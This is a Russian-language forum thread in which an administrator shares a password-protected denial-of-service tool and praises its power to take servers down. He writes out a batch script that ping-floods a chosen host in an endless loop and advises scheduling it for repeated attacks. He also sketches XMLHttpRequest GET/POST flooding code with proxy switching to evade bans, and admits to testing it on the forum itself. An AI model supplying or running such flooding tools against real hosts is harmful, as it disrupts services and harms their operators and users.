Крутая досерка, для ознакомления


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Если у кого руки чешутся, вот одна из лучших прог для этого дела Unknown DoSer release:

[*]Простая настройка
[*]Убойность[*]Маленький вес (35кб)
[*]Атака по URL, т.е. не надо вычислять IP адрес
[*]Два метода атаки (POST & GET)
[*]Рандомное сообщение
[*]Таймаут
[*]Выбор времени атаки

10935075zz.png


Не плохой мануальчик:


ВАЖНО: Сервак РЕАЛЬНО положить этой штукой, выложено для ознакомления, пароль: 111 !Отдыхай!!! nea88
 

Вложения

  • Unknown DoSer.zip
    16.9 КБ · Просмотры: 110

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Олег,а как автоматизировать процесс?(чтобы она сама могла "долбить" через определённые промежутки времени)?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Олег,а как автоматизировать процесс?(чтобы она сама могла "долбить" через определённые промежутки времени)?
Фиг знает, как вариант можно написать что-то подобное самому, вот например я за пять минут состряпал батник, делает почти тоже самое:
Код:
@echo off
title Dos Example.
echo.
echo Welcome Dos By X-Shar.ONLY FOR AN EXAMPLE !!!
echo.
echo Please Enter a host IP
echo.
set /p m=HOST:
echo.
set /p n=Packet Size:
echo.
:A
echo Attack by Server: %m%
ping %m% -l %n% -t > nul
goto A

Вот бесконечный цикл пинга:

Код:
:A
ping %m% -l %n% -t > nul
goto A

Во вложении приложил батник как пример (Пароль:111).

Ну а далее просто запускать этот батник, через определённое время с ключами через планировщик, как-то так !

В инете должно-быть больше инфы, я в этом деле не спец., так просто ради интереса, интересуюсь такими штуками, если что найдёшь выложи сюда...

И ещё, я пробовал досить этой прогой, этот форум, в этоге мой IP-адрес забанил файервол и ничего больше...Hi-H-88
 

Вложения

  • Dos_Example.zip
    365 байт · Просмотры: 14

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Ок.Спасибо тебе за полезную информацию.
Да это фигня !

Я вот подумываю, если время будет может попробовать как-то модифицировать эту досерку, можно сделать нормальный интерфейс + как-нить определять, если забанен IP-адрес сразу менять на прокси, ну и запуск в определённое время, сделать паузу например, думаю может получится реально нужная софтина, если такой ещё конечно нет !Не въехал!!!

Хочу поучится кодить на QT, как раз искал какую-нить интересную задачку, это как-раз подходит, в целом задача не такая-уж наверное и сложная, но нужно время + неизвестно сколько ещё провожусь, профи если минут за 15-ть такое сделает, я-же могу недели или месяцы провозиться !Как об стену !!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Для программиста-фигня,для юзера-диво))Ты нам сообщи об успехах в модифицировании этой "пушечки",пожалуйста.А,мы её протестируем,если требуется.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Для программиста-фигня,для юзера-диво))
Время и желание будет, посмотрю ! ;)

Если я всё правильно понимаю и если брать эту досерку как за идею, то это вообще может сделать любой школьник !

Особо не вникал, но вот например, если делать в QT:

Нам нужно реализовать два типа запроса POST и GET, в QT есть уже готовый класс XMLHttpRequest !
Чтобы выполнить GET-запрос нужно создать новый экземпляр класса XMLHttpRequest:
Код:
var dos = new XMLHttpRequest();

После этого с помощью метода open () указывается тип запроса (GET или POST) и URL-адрес запрашиваемой страницы вместе с передаваемыми данными. Затем методом send () инициируется запрос.
Код:
dos.open("GET", "http://site.ru/get.php?data=123");
dos.send();

Отправка POST-запросов в QT происходит по аналогии с GET-запросами с небольшой особенностью. Данные для отправки указываются не в URL страницы, а передаются в метод send (). Также при отправке POST-запроса обязательно нужно указывать заголовок Content-Type, содержащий кодировку передаваемых данных.
Код:
dos.open("POST", "http://site.ru/post.php");
var params = 'data=' + encodeURIComponent("data data data");
dos.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
dos.send(params);

var params = 'data=' + encodeURIComponent("data data data"); - Здесь отсылаемые данные, можно сделать рандом ! ;)

В общем-то, не знаю будет-ли работать данная конструкция, нужно проверять, если работает, то дальше проще, для прокси по мойму тоже свой класс есть...

А вообще QT классная штука, позволяет делать кросс-платформенные проги, можно данную досерку и под другие ОС сделать !wink1
 
Верх Низ